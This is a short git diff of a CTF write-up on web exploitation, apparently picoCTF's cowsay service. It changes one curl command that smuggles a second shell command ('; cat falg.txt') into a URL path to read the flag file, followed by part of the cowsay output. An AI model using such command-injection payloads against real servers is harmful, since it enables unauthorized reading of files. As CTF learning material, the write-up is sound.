diff --git a/Phase 2/03 Web Exploitation.md b/Phase 2/03 Web Exploitation.md index af69615..76b0e6f 100644 --- a/Phase 2/03 Web Exploitation.md +++ b/Phase 2/03 Web Exploitation.md @@ -48,7 +48,7 @@ yarn.lock We find a file `falg.txt`, presumably containing the desired flag. Running `curl` once again, we find that is indeed the case ``` -~ $ curl "https://caas.mars.picoctf.net/cowsay/ac; cat falg.txt" +~ $ curl "https://caas.mars.picoctf.net/cowsay/test; cat falg.txt" ______ < test > ------